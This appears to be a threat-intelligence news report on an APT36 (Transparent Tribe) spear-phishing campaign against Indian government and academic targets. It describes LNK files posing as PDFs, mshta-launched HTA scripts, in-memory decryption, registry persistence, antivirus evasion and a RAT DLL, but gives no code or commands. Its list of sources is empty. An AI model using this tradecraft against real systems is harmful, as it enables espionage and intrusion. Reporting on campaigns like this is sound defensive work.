A sophisticated cyber espionage campaign attributed to APT36, also known as Transparent Tribe, is actively targeting Indian government and academic institutions. The operation utilizes a multi-stage approach centered around weaponized LNK files disguised as PDF documents, aiming to deliver malicious payloads and establish persistent access. Security researchers have observed the campaign leveraging advanced techniques to evade detection and maintain a foothold within targeted networks.
The initial attack vector involves spear-phishing emails containing LNK files. These files are cleverly masquerading as legitimate PDF documents, enticing recipients to click and execute them. Upon execution, the LNK file triggers the launch of an HTA script through mshta.exe, facilitating fileless payload delivery. This technique effectively bypasses traditional security measures that rely on file-based detection.
Once the HTA script is executed, it initiates a series of in-memory decryption routines to reconstruct the final malware payload. The malware then establishes registry-based persistence mechanisms to ensure long-term access, even after system reboots. The campaign also employs obfuscated command-and-control (C2) infrastructure, utilizing reversed HTTP endpoints to communicate with external servers and exfiltrate stolen data. While a C2 server was registered in mid-April 2025, it is currently inactive.
The malware delivered in this campaign includes an MSI payload and a Remote Access Trojan (RAT). The RAT, implemented through a malicious DLL (iinneldc.dll), provides attackers with remote control over compromised systems. Attackers have adapted their persistence methods to evade detection by various antivirus solutions, including Quick Heal, Avast, AVG, and Avira. A decoy PDF file mimicking a legitimate advisory from PKCERT issued in 2024 is also used to further disguise the malicious intent.
APT36, a threat actor known to be aligned with Pakistan, has a history of targeting Indian governmental entities with cyber espionage operations. This latest campaign demonstrates the group’s continued focus on India and its willingness to employ advanced techniques to achieve its objectives. The use of LNK files, fileless execution, and adaptive persistence highlights the sophistication of the threat and the importance of robust security measures to protect against such attacks. The campaign’s targeting of both government and academic entities underscores the broad scope of APT36’s interests.
Organizations and individuals in India are advised to remain vigilant and implement security best practices, including scrutinizing email attachments, keeping software up to date, and utilizing multi-factor authentication. Further investigation into the campaign’s tactics, techniques, and procedures (TTPs) is ongoing to better understand the threat and develop effective mitigation strategies.
Sources: